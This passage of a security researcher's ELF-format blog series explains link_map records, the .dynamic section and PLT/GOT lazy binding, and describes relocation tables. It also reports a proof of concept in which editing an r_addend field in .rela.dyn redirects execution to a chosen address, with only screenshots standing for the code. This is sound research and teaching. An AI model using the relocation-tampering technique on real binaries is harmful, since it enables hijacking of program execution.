<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSmPpHtJW26bG9sR73spOtkT0eC8S4p0VMqIE-3z4aYuC2scW1CcoLuOT7n5mxcryrvgtg0CoyqOtkT7sfdyYPnhtBJVzxKVKxBtWsSima4MejSf60c_TSdIhn_w5lEd_mWIgTH5oljM/s1600/l_next-prev.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="517" data-original-width="1045" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSmPpHtJW26bG9sR73spOtkT0eC8S4p0VMqIE-3z4aYuC2scW1CcoLuOT7n5mxcryrvgtg0CoyqOtkT7sfdyYPnhtBJVzxKVKxBtWsSima4MejSf60c_TSdIhn_w5lEd_mWIgTH5oljM/s1600/l_next-prev.png" /></a></div>
<br />
<br />
So essentially each <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> ends its record with these values, they contain address for finding the next element in the list and the previous. <i>Don't see anything just yet but; I'm looking out for things that make use of the l_next and l_prev elements in a turing completey way ;) </i><br />
<br />
There is one other field would like to expand on here namely the <span style="font-family: "courier new" , "courier" , monospace;">l_ld</span>, this is the reference to the <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section entry for this function. And as you guessed it means we will probably need to talk about how the <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section works.<br />
<h2>
<span style="font-family: inherit;">The .dynamic section</span></h2>
<br />
The dynamic section essentially holds a number of arguments that inform on and influence parts of the dynamic linker's behavior. This is because as a component of the runtime, the dynamic linker does many other things besides just relocate functions it also executes other house keeping functions like INIT and FINI. Here's what the entries of the dynamic section look like according to glibc:<br />
extract from elf/elf.h:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4yEYF4zGRhlttkYISFO7sKEYDKqvy5jJnc-c_DikqTNnPntc_nYRjgEIfTzPhpF5Z0bBj6V5UUG52G2JBplb21HfzW6A05RHrS_GnAe6OAvfqc8kLUig09-hRj3dFHzAVZPBxHV_yac/s1600/Screenshot+from+2018-11-08+21-44-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="909" data-original-width="1022" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4yEYF4zGRhlttkYISFO7sKEYDKqvy5jJnc-c_DikqTNnPntc_nYRjgEIfTzPhpF5Z0bBj6V5UUG52G2JBplb21HfzW6A05RHrS_GnAe6OAvfqc8kLUig09-hRj3dFHzAVZPBxHV_yac/s1600/Screenshot+from+2018-11-08+21-44-24.png" /></a></div>
<br />
<br />
This is simply a list of two address values, one for indicating the type of dynamic section entry (<span style="font-family: "courier new" , "courier" , monospace;">d_tag</span>) and one for the actual value of the entry (<span style="font-family: "courier new" , "courier" , monospace;">d_un</span>). We have some strange union type here because it allows arbitrary information instead of just addresses. Take a look at this hexdump example to see how the value's can vary for the <span style="font-family: "courier new" , "courier" , monospace;">d_un</span> field:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxgBnpckG874WcSF0JxI4_6JFctfESQVClXbiSnM_66TT5hmr7_l14WiFwFu8OgvIwW5COGqsUuZ59nzun3pea9A4cKEe9OtQNvisOa5y6ul-bgDclp-dWiPDZ5hsPKj7WR9MCfVnEgQA/s1600/dynamic+section+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="1041" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxgBnpckG874WcSF0JxI4_6JFctfESQVClXbiSnM_66TT5hmr7_l14WiFwFu8OgvIwW5COGqsUuZ59nzun3pea9A4cKEe9OtQNvisOa5y6ul-bgDclp-dWiPDZ5hsPKj7WR9MCfVnEgQA/s1600/dynamic+section+%25281%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
Okay so that's the <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> and <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section done we can move onto looking at what happens when a function is resolved and how this affects the GOT.<br />
<br />
<h2 style="text-align: left;">
Runtime lazy loading up close</h2>
<br />
To get functions resolved without preparing all the relocations up front, the ELF format and dynamic linker use a mechanism called lazy loading. Lazy loading essentially means resolving and patching up the GOT entries for a function when it is called. This is obviously so that subsequent function calls do not need to involve the dynamic linker / runtime (<i>in a previous post i showed explicitly how the dynamic linker kicks in again if you mess with some other meta-data</i>).<br />
<br />
Okay so lets see if all this cool theory is true in practice. How are we going to see what the runtime does with the GOT? Well to lay out a simple methodology:<br />
<ol style="text-align: left;">
<li>Find a pointer to the top of the PLT (<i>I will also cover some structuring of the PLT to show you where the "top" is</i>)</li>
<li>Once we have the PLT we can then find two things 1) the GOT entry for the function being called and 2) a break point to set before the GOT is edited (<i>namely the entry point of the runtime</i>)</li>
<li>Set a break point to a function </li>
<li>Compare the GOT values before and after. </li>
</ol>
<div>
<br /></div>
<div>
First step is to find a pointer to the top of the PLT, lets take a look at an annotated dump of a binary's <span style="font-family: "courier new" , "courier" , monospace;">_start </span>and PLT sections (<i>I disassembled _start because in order to call _start_main it needs to involve the PLT as well</i>):</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoDU7vjOMYq5FY322tVPtXm2zsBvY2FWqC3GAJ-zD9e-HEBqOQdnAN5GTtdgVRYp1YWHuxa2LncbH3f09tz0ZERZJPo8FvQLdkmc3qWojIQ-yXPP7gX2KPiDxn080pB5jgGNEe4e2iXY/s1600/PLT%252BGOT+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="741" data-original-width="1155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoDU7vjOMYq5FY322tVPtXm2zsBvY2FWqC3GAJ-zD9e-HEBqOQdnAN5GTtdgVRYp1YWHuxa2LncbH3f09tz0ZERZJPo8FvQLdkmc3qWojIQ-yXPP7gX2KPiDxn080pB5jgGNEe4e2iXY/s1600/PLT%252BGOT+%25281%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
So we can see from the picture that at instruction <span style="font-family: "courier new" , "courier" , monospace;">0x400534</span> a call to the PLT entry of <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> is made. This then ends up doing a couple things:</div>
<div>
<ol style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x4004e0</span> jumping to <span style="font-family: "courier new" , "courier" , monospace;">0x601030</span> the GOT entry for <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span><span style="font-family: inherit;">. Th</span>is is because when the linker is does lazy loading; the first instruction will hit the function directly if the GOT has been patched but upon first call this is always the next instruction after the jump - so its effectively a jump to the next position in the PLT. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x4004e6</span> pushing a number onto the stack - this is the index of the relocation entry that applies to this action, the dynamic linker needs this to do its job.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x4004e6</span><span style="font-family: inherit;"> jumping to the head of the PLT which invokes the dynamic linker directly.</span></li>
</ol>
<div>
Okay lets see what the PLT looks like in its full glory:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg5SxV0v5tPQCOrnXYrYFP4ODRULnL6e3m3HC4j1KJgHSiPhTmxHopTi-_4dxyin3nAq2LlNmY_qVFXzC_SawSrGMPPCBSnnQN1rdAebmMhoEfYTWc1EEFb7gvCFV3dOIC4xTVx63kEtg/s1600/PLT+disection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="1060" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg5SxV0v5tPQCOrnXYrYFP4ODRULnL6e3m3HC4j1KJgHSiPhTmxHopTi-_4dxyin3nAq2LlNmY_qVFXzC_SawSrGMPPCBSnnQN1rdAebmMhoEfYTWc1EEFb7gvCFV3dOIC4xTVx63kEtg/s1600/PLT+disection.png" /></a></div>
<div>
<br /></div>
And so we can see a format for the PLT forming, namely every entry has these base elements:<br />
<ul style="text-align: left;">
<li>jump to the GOT</li>
<li>push reloc index</li>
<li>jump to PLT head (<span style="font-family: "courier new" , "courier" , monospace;">_dl_resolve_runtime</span>*)</li>
</ul>
<div>
The head contains some interesting code. We can see at instruction <span style="font-family: "courier new" , "courier" , monospace;">0x4004a0</span> some value gets pushed onto the stack before it jump's off to the <span style="font-family: "courier new" , "courier" , monospace;">dl_runtime_resolve</span> at instruction <span style="font-family: "courier new" , "courier" , monospace;">0x4004a6</span>. Whats happening here is the <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> for the object <i>(libc.so, libsecurity etc etc</i>) that holds the symbol involved in the lazy loading is being passed to the <span style="font-family: "courier new" , "courier" , monospace;">dl_runtime_resolve</span> function as an argument.<br />
<br />
We can dissect this link_map through different calls to the <span style="font-family: "courier new" , "courier" , monospace;">dl_runtime_resolve</span> to see that it is actually always the link_map object. Knowing that the link_map must contain a pointer into the dynamic section; so if we see dynamic section approximating values in the area round the pointer being passed to <span style="font-family: "courier new" , "courier" , monospace;">dl_runtime_resolve</span> it is most likely a link_map object. Or I should rather say: <i>if it appears there whatever it is - <span style="font-family: "courier new" , "courier" , monospace;">dl_runtime_resolve</span> will treat it like a <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> object</i>.<br />
<br />
So lets see what these values look like as they are flying into the resolve call:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScRDT8QK_th2zfZsSv8SLeR0xgVcPMW5c5E_eMOF4lp6B3ZuTNn9hNnks5T3SwI09__mRJzOr4ZPenP7DlAk0qF5B1z2suY1AtQiT3Qm1qwoP45_2lmxrmWAqqRlMAykeh1H6BJruMA4/s1600/link_map.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="1175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScRDT8QK_th2zfZsSv8SLeR0xgVcPMW5c5E_eMOF4lp6B3ZuTNn9hNnks5T3SwI09__mRJzOr4ZPenP7DlAk0qF5B1z2suY1AtQiT3Qm1qwoP45_2lmxrmWAqqRlMAykeh1H6BJruMA4/s1600/link_map.png" /></a></div>
<br />
I can also show that the GOT in fact does get patched with new values as the runtime gets called. Here's a screenshot showing this for the puts resolution:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqWfl4AVLvGO6lMoD8W8xdbN03ue9O1fF_fYDdP3PUsYoG6e3O2sPY1vho7tufua6dTP8qIK84q0JpckoB6zYhLZLMrpaPR5Rhpc4x2OVtuAZEy0Io693jqDlgnw05PSe2MCjvYjLfD5I/s1600/puts_GOT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="970" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqWfl4AVLvGO6lMoD8W8xdbN03ue9O1fF_fYDdP3PUsYoG6e3O2sPY1vho7tufua6dTP8qIK84q0JpckoB6zYhLZLMrpaPR5Rhpc4x2OVtuAZEy0Io693jqDlgnw05PSe2MCjvYjLfD5I/s1600/puts_GOT.png" /></a></div>
<br /></div>
<div>
After the second break point at <span style="font-family: "courier new" , "courier" , monospace;">0x4004a0</span> hits (<i>which is the setup code for the call to <span style="font-family: "courier new" , "courier" , monospace;">dl_runtime_resolve</span></i>) we can clearly see some new entry in the GOT at address <span style="font-family: "courier new" , "courier" , monospace;">0x601020</span>; the update adds the address <span style="font-family: "courier new" , "courier" , monospace;">0x7ffff7a7c690</span> which we can see from symbol information in the debugger is the <span style="font-family: "courier new" , "courier" , monospace;">_IO_puts</span> function! GOT entry correctly updated.<br />
<br />
<i>Okay that's pretty much it for this post. In later posts I may talk a little about how to abuse this lazy loading mechanism to achieve execution of other functions - some cool tricks. For now I thought I'd keep it short and only explain some main concepts here and leave the advance sorcery and ELF black magic for future posts. Stay tuned folks!</i></div>
</div>
<div>
<h2 style="text-align: left;">
References and Reading</h2>
Some stuff I read and relied on to make this post. Very useful information here!<br />
<ol style="text-align: left;">
<li><a href="https://docs.oracle.com/cd/E23824_01/html/819-0690/chapter3-7.html">https://docs.oracle.com/cd/E23824_01/html/819-0690/chapter3-7.html</a></li>
<li><a href="https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf">https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf </a></li>
<li><a href="https://www.dabeaz.com/papers/CiSE/c5090.pdf">https://www.dabeaz.com/papers/CiSE/c5090.pdf</a> </li>
<li><a href="https://www.bottomupcs.com/dynamic_linker.xhtml">https://www.bottomupcs.com/dynamic_linker.xhtml</a></li>
<li><a href="http://refspecs.linuxfoundation.org/ELF/zSeries/lzsabi0_zSeries/x2251.html">http://refspecs.linuxfoundation.org/ELF/zSeries/lzsabi0_zSeries/x2251.html</a> </li>
<li><a href="https://www.lurklurk.org/linkers/linkers.html">https://www.lurklurk.org/linkers/linkers.html</a> </li>
<li><a href="https://0x00sec.org/t/linux-internals-the-art-of-symbol-resolution/1488">https://0x00sec.org/t/linux-internals-the-art-of-symbol-resolution/1488</a></li>
<li><a href="https://akkadia.org/drepper/dsohowto.pdf">https://akkadia.org/drepper/dsohowto.pdf</a></li>
<li><a href="https://www.iecc.com/linker/linker10.html">https://www.iecc.com/linker/linker10.html</a></li>
<li><a href="https://github.com/mewrev/dissectionhttps://0x00sec.org/t/linux-internals-dynamic-linking-wizardry/1082">https://github.com/mewrev/dissectionhttps://0x00sec.org/t/linux-internals-dynamic-linking-wizardry/1082</a> </li>
<li><a href="https://grugq.github.io/docs/subversiveld.pdf">https://grugq.github.io/docs/subversiveld.pdf</a></li>
<li><a href="http://phrack.org/issues/61/8.html">http://phrack.org/issues/61/8.html</a> </li>
</ol>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-50735076561445090742018-10-22T18:34:00.000-07:002018-10-22T18:42:42.114-07:00Introduction to the ELF Format (Part VI) : More Relocation tricks - r_addend execution (Part 3)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div>
So I lied a little about what would be the next in the series, I realized there was something I should have added to the previous one -<i> which ironically was the addends about the <span style="font-family: "courier new" , "courier" , monospace;">r_addend </span>field :)</i> So here it is, the section on mangling <span style="font-family: "courier new" , "courier" , monospace;">r_addend </span>fields with some other tricks I left out.<br />
<h3 style="text-align: left;">
Some things you might need are:</h3>
<ol style="text-align: left;">
<li>Executable code we will disect, tihs is the definition for the never_call.c <a href="https://gist.github.com/k3170makan/c7712b7aa14f1c2e7c0e7ae725f2fac1">https://gist.github.com/k3170makan/c7712b7aa14f1c2e7c0e7ae725f2fac1</a> </li>
<li>binutils </li>
<li>GCC</li>
</ol>
<div>
<i>An average linux distro will have these things already ready to roll besides maybe hexedit/hexdump. </i></div>
</div>
<h2 style="text-align: left;">
Mangling dynamic symbol relocation <span style="font-family: "courier new" , "courier" , monospace;">r_addends</span></h2>
<div>
<div style="text-align: left;">
<i> r_addend you glad it didn't say 0xAAAA...?</i></div>
<div style="text-align: left;">
<br /></div>
<div>
</div>
</div>
<div>
In the previous post, I mentioned the basics of the relocation entry format and showed how complex they can become and how one ELF object can have a bunch of different <span style="font-family: "courier new" , "courier" , monospace;">.rela.[name] </span>sections. All of which will not only have relocs applied to different stages of the ELFs life cycle, for instance calling functions but can also help the runtime perform initialization. For the first example we are going to focus on the <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span> section and what happens when we are too liberal with the values in the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span>.<br />
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> if you weren't aware; is a field in relocation entries for ELF symbols that specify an additional auxiliary parameter to a relocation calculation. I also mentioned that this field is not actually used much on the x86_64 platform and for the most part (<i>as far as I can see</i>) - is nulled out. So you will have a <span style="font-family: "courier new" , "courier" , monospace;">.rela.*</span> (<i>'<span style="font-family: "courier new" , "courier" , monospace;">a</span>' meaning with <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span></i>) sections to your binary, it will just always have its <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> fields set to 0 most of the time.</div>
<div>
<br /></div>
<div>
Poking and prodding these <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> fields as they appear in some binaries; I found is that you can actually get the run-time to execute from the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> value if you made it non-zero. Here's the proof of concept:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwWXSqI-L9-o7YZipDHVnbN2hbbaP5Xm7qms6R1JTcIu1YmpUHYkJUVeDUCCILCSBLhhtFWqebz06Fd-IUqRdlGaXMtn10iAGbT8b0ENS-GDicMHvv7UOQ6vhMTWX8VvP5TJP1Wdd9z-g/s1600/r_addend+poc+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="1214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwWXSqI-L9-o7YZipDHVnbN2hbbaP5Xm7qms6R1JTcIu1YmpUHYkJUVeDUCCILCSBLhhtFWqebz06Fd-IUqRdlGaXMtn10iAGbT8b0ENS-GDicMHvv7UOQ6vhMTWX8VvP5TJP1Wdd9z-g/s1600/r_addend+poc+%25282%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
<br /></div>
<div>
In this screenshot I am changing the value for <span style="font-family: "courier new" , "courier" , monospace;">__gmon_start__(2)'s </span><span style="font-family: inherit;">relocation </span><span style="font-family: "courier new" , "courier" , monospace;">r_addend</span><span style="font-family: inherit;"> which appears at address </span><span style="font-family: "courier new" , "courier" , monospace;">0x3B0</span><span style="font-family: inherit;">.</span> <i>Its not so important where it gets called, I am pretty sure its just after <span style="font-family: "courier new" , "courier" , monospace;">_start </span>and before the <span style="font-family: "courier new" , "courier" , monospace;">main </span>method. </i><br />
<br />
Whats good to know about that is that according to that theory the <span style="font-family: "courier new" , "courier" , monospace;">never_call </span>function should in no way ever be called - <i>we can pretty much bet there is no simple logical progression leading to never_call's execution, this is because the code for this binary is only written to print two strings and then exit</i>.<br />
<br />
Now, you should check the readelf output as well (<i>in the screenshot</i>); it confirms that we are changing this field correctly. Also notice that we have only edited the <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span>'s <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> value for this field; meaning the actual symbol value for <span style="font-family: "courier new" , "courier" , monospace;">__gmon_start__</span> is untouched in both the dynamic symbol table (<span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span>) and full symbol table (<span style="font-family: "courier new" , "courier" , monospace;">.symtab</span>).<br />
<br />
This pretty much does straight up execute the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> value, I've confirmed this in many other ways (<i>for instance we can see that the segfault happens at this instruction point value consistently</i>):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGoQGbkGp42uI4xKyxCQtW-7kQzlbJZLLXascVanjFe1Jynxjr937LhtWyBxuSEBNyFlzwNgXWsCzuyCUF0cthLKyNt362R-kUibVN-v3g8LbJ6gwL-AlCeN7SNLX6LwO0eMfaUKNXUE/s1600/Screenshot+from+2018-10-21+20-10-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="634" data-original-width="1327" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGoQGbkGp42uI4xKyxCQtW-7kQzlbJZLLXascVanjFe1Jynxjr937LhtWyBxuSEBNyFlzwNgXWsCzuyCUF0cthLKyNt362R-kUibVN-v3g8LbJ6gwL-AlCeN7SNLX6LwO0eMfaUKNXUE/s1600/Screenshot+from+2018-10-21+20-10-39.png" /></a></div>
<br />
<br />
<i>It is of course implied that I am forcing it to take the completely unnatural instruction pointer values of 0xaa.. 0xbb... etc.</i><br />
<br />
<br /></div>
<div>
This behavior is isolated to a couple of relocation types (<span style="font-family: "courier new" , "courier" , monospace;">r_types</span>). I furthered my investigation into which <span style="font-family: "courier new" , "courier" , monospace;">r_types </span>allow for this in some capacity, and I got execution by using the following relocation types:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_64 0x01</span> - Direct 64 bit Reloc</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_IRELATIVE 0x25</span> - Adjust indirectly by program base </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_RELATIVE 0x08</span> - Adjust by program base</li>
</ul>
<br />
<i>I'll get into deep detail about exaclty why these end up getting executed but its going to take a little more research before I can confidently talk about that lol.</i><br />
<br />
We know of course the <span style="font-family: "courier new" , "courier" , monospace;">rela </span>sections will appear in the live memory image (this is because they form part of a <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD </span>section(1)), so we know that it will potentially be <i>"referencable"</i> from inside running code. This means it offers data to target that could potentially affect execution flow. </div>
<div>
<h2 style="text-align: left;">
Footnotes</h2>
</div>
<div>
<ol style="text-align: left;">
<li>Not directly because the section they appear in is marked ALLOC as <i>some </i>would refer to it.</li>
<li>which is to cut a long story short <i>afaik</i> a profiling function that gets called during the runtime initialization from the <span style="font-family: "courier new" , "courier" , monospace;">_init()</span>.</li>
</ol>
<h2 style="text-align: left;">
References and Reading</h2>
</div>
<div>
<ul style="text-align: left;">
<li><a href="https://paper.seebug.org/papers/Archive/refs/elf/ELF-berlinsides-0x3.pdf">https://paper.seebug.org/papers/Archive/refs/elf/ELF-berlinsides-0x3.pdf</a></li>
<li><a href="https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf">https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf </a></li>
</ul>
</div>
<div>
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:</div>
<div>
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>(Part V) : C Start up <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html</a> </li>
<li>(Part VI) </li>
<ol>
<li>The Symbol Table and Relocations Part 1 <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html</a> </li>
<li>Symbols and Relocs Part 2 https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi_18.html</li>
<li>(Part VI) : this</li>
</ol>
</ol>
<div>
<i>So if these sound like another language to you, try starting a little further up in the chain ;)</i></div>
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-84859626019266764752018-10-18T20:40:00.000-07:002018-10-21T19:01:47.360-07:00Introduction to The ELF Format (Part VI): The Symbol Table and Relocations (Part 2)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:<br />
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>(Part V) : C Start up <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html</a> </li>
<li>(Part VI) : The Symbol Table and Relocations Part 1 <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html</a> </li>
<li>this </li>
</ol>
<div>
<br /></div>
<div>
In this post I'm going to explain a little bit more about how Relocations and Symbols work. We talked about the symbol table specifically in the previous post, but weren't fair about why Relocations are needed and who they are used.</div>
<h2 style="text-align: left;">
Introduction</h2>
<div>
<i>"The real is what resists symbolization absolutely" - Jacques Lacan (1)</i></div>
<div>
<br /></div>
<div>
When compiling and linking a program; the attributes used in each component object is placed at a given <i>offset </i>away from its original position in the final object. The ELF format records this offset and a mechanism for its resolution in Relocation records. Relocation records hold information used by various utilities to help aim at the right part of the Elf file containing the definition of a symbol. It also allow compilers and C developers to extend the functionality of symbol resolution - <i>with extra hooks and plugins and what have you, so like exploit dev but except you actually want to write to a function pointer with data lol</i>. So symbol information, but for symbols themselves!<br />
<br />
Relocations can take on a number of types subsets of which are colloquialized and implemented across architectures - <i>so many archs will have their own symbol resolution mechanisms applied to the relocation record format discussed here</i>. Besides this already sparse field of definitions; relocation records (<i>referred to as "relocs" from here on out...sometimes</i>) are used for various reasons through a programs life cycle. Some relocs are used to prep the runtime, others for plain old dynamic linking and lazy loading and there may very likely be more yet defined and unmentioned functions.<br />
<br />
Lets take a look at how this Relocation format works and which sections are meant to hold information for it.</div>
<div>
<h2 style="text-align: left;">
The Relocation Table (.rel, .rela.dyn and friends)</h2>
To give an overview of how complex these fields are here's a small cheat sheet:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0E56blBE3xgH02Qq8LjEj4g574YUu6AkaIDiGH3GPs02IA6iBePsghZeomtISjS4LXCG7gf5dScoy89Bufst9cMvwm3BrLrUs4a-EG97jbBJJGExqRrAqht3L21aZrHMvUj08toQ-Yb4/s1600/relocation_entry_format_cheat_sheet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="637" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0E56blBE3xgH02Qq8LjEj4g574YUu6AkaIDiGH3GPs02IA6iBePsghZeomtISjS4LXCG7gf5dScoy89Bufst9cMvwm3BrLrUs4a-EG97jbBJJGExqRrAqht3L21aZrHMvUj08toQ-Yb4/s1600/relocation_entry_format_cheat_sheet.png" /></a></div>
<br />
<br />
So as we know the section header table will be able to point us at different parts of an ELF file and elaborate what they are meant for. Some section headers mentioned here are specifically for holding relocation information; and because relocation as we said can have multiple purposes, there are multiple relocation sections. The naming scheme should be pretty much the same in that it mentions more or less what its relocation entries are for in the <span style="font-family: "courier new" , "courier" , monospace;">.rela.[name]</span> scheme:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">.rel.dyn .rela.dyn </span>- relocation entries for dynamic symbols </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">.rel.plt .rela.plt</span> - relocation entries for PLT meta-data (<i>usually prepping JMP gadgets)</i></li>
<li><i>other types exist but I find they are rarely used or hard to find examples for.</i></li>
</ul>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">rela </span>with an "a" at the end; indicates relocation with the addend fields are used in the section. Relocation with addend is the one commonly used on x86_64 it seems;<i> </i>although the actual <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> field is almost always 0 -<i> glibc also maintains some flags to configure whether this field is used as part of the relocation</i>.<br />
<br />
Basically that means, you will see relocation with addends used in "format"; but the actual addend will most likely always be set to 0. Which is more effectively just a normal reloc but with a NULL word at the end of each one. <i>Potentially useful depending on how code trusts that NULL at the end when it loops through records</i>.<br />
<br />
Anyway, seeing that there could be a number of different <span style="font-family: "courier new" , "courier" , monospace;">rela.[name]</span> fields down to just about any crazy purpose I decided to go looking for some weird <span style="font-family: "courier new" , "courier" , monospace;">[name]</span> values . So I scanned my own machine quite liberally for ELF objects and found that few of them use any wilder form of .rel section - <i>compared to the common rel(a).dyn, rel(a).plt</i>:<br />
<br /></div>
